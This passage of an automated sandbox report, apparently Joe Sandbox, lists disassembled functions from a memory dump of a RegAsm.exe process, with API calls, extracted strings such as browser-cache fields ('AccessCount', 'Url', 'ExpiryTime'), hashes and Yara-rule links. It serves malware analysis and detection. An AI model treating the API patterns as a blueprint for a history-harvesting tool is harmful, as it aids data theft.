                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E3EC
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E407
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E422
                                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,756F13E0), ref: 0040E43D
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                                                                  • API String ID: 3849927982-2252543386
                                                                                                                                                                                                  • Opcode ID: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                                                                                  • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 60a964cb735b7f2e388f13091a32ea25ff980dc40793d4a043d01af8ab6a7d2e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                                                                  Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004091E2
                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 0040933B
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409411
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 00409429
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                                                                                                                                                                  • memcmp.MSVCRT ref: 004094AC
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3715365532-3916222277
                                                                                                                                                                                                  • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                  • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                                                                                                                                                                  Function 00412172 Relevance: 19.7, APIs: 13, Instructions: 189windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetDC.USER32(00000000), ref: 004121FF
                                                                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                                                                                                                  • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                                                                                                                  • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                                                                                                                  • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                                                                                                                  • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                                                                                                                  • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                                                                                                                    • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                                                                                                                    • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                                                                                                                    • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                                                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                                                                                                                  • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                                                                                                                  • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1700100422-0
                                                                                                                                                                                                  • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                  • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                                                                                                                                                                  • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                                                                                                                                                                  Function 004111C1 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                                                                                                                  • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                                                                                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                                                                                                                  • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                                                                                                                  • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                                                                                                                  • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 552707033-0
                                                                                                                                                                                                  • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                  • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                                                                                                                                                                  Function 004060A4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97timewindowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                                                                                                                  • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                                                                                                                  • GetParent.USER32(?), ref: 00406136
                                                                                                                                                                                                  • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                                                                                                                  • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                                                                                                                  • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                                                                                                                  • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                                                                                                                  • String ID: A
                                                                                                                                                                                                  • API String ID: 2892645895-3554254475
                                                                                                                                                                                                  • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                  • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                                                                                                                                                                  Function 0040C084 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 110stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                                                                                                                    • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                                                                                                                    • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C140
                                                                                                                                                                                                  • strchr.MSVCRT ref: 0040C151
                                                                                                                                                                                                  • _strlwr.MSVCRT ref: 0040C15F
                                                                                                                                                                                                  • memset.MSVCRT ref: 0040C17A
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                                                                                                                                                                  • String ID: 4$h
                                                                                                                                                                                                  • API String ID: 4019544885-1856150674
                                                                                                                                                                                                  • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                  • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                                                                                                                                                                  Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004082EF
                                                                                                                                                                                                    • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                  • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 290601579-0
                                                                                                                                                                                                  • Opcode ID: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                  • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c60d666c950e1de6cba0954a24524a9e41ca0abebb320c38a87f7a6f74f5840a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                  Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                    • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                    • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                  • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                  • memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                                                                    • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                  • String ID: strings
                                                                                                                                                                                                  • API String ID: 3166385802-3030018805
                                                                                                                                                                                                  • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                  • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                  Function 0040A06C Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                                                                  • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                                                                  • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                                                                  • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                                                                  • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1331804452-0
                                                                                                                                                                                                  • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                  • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                                                                  Function 00410030 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  • <?xml version="1.0" ?>, xrefs: 0041007C
                                                                                                                                                                                                  • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
                                                                                                                                                                                                  • <%s>, xrefs: 004100A6
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$_snwprintf
                                                                                                                                                                                                  • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                                                                                                  • API String ID: 3473751417-2880344631
                                                                                                                                                                                                  • Opcode ID: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                  • Instruction ID: 2862698e7f89dc449948c814091faf4507903f68b21858a7dbdf66e33a92e1a6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8f05c840c11c4290d444f2162549af975e664009f5abef6099482a1c5cfc950c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                                                                                                  Function 0040A178 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: wcscat$_snwprintfmemset
                                                                                                                                                                                                  • String ID: %2.2X
                                                                                                                                                                                                  • API String ID: 2521778956-791839006
                                                                                                                                                                                                  • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                  • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                                                                                                  Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                                                                                                  • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                                                                                                  • free.MSVCRT ref: 0041822B
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: PathTemp$free
                                                                                                                                                                                                  • String ID: %s\etilqs_$etilqs_
                                                                                                                                                                                                  • API String ID: 924794160-1420421710
                                                                                                                                                                                                  • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                                                                                  • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                                                                  Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                                                                                                  • memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                    • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                                                                                                    • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1471605966-0
                                                                                                                                                                                                  • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                  • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                                                                                                  Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 004100FB
                                                                                                                                                                                                  • memset.MSVCRT ref: 00410112
                                                                                                                                                                                                    • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                                                                                                    • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                                                                                                  • _snwprintf.MSVCRT ref: 00410141
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                                                                                                  • String ID: </%s>
                                                                                                                                                                                                  • API String ID: 3400436232-259020660
                                                                                                                                                                                                  • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                  • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                                                                                                  • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                                                                                                  Function 00401137 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                                                                                                    • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
